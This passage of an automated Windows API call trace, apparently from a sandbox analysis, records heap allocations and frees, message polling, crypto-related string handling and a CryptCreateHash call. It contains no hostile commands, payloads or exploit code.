dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.307] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0258.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0258.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0258.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.308] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.308] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.308] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0258.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0258.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.309] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.309] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.309] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0258.309] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0258.309] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0258.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.309] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.310] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.310] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0258.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.310] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.310] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0258.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0258.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0258.310] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0258.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51820, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0258.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0258.311] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0258.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0258.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.311] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0258.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0258.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0258.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0258.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0258.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0258.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0258.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0258.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0258.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 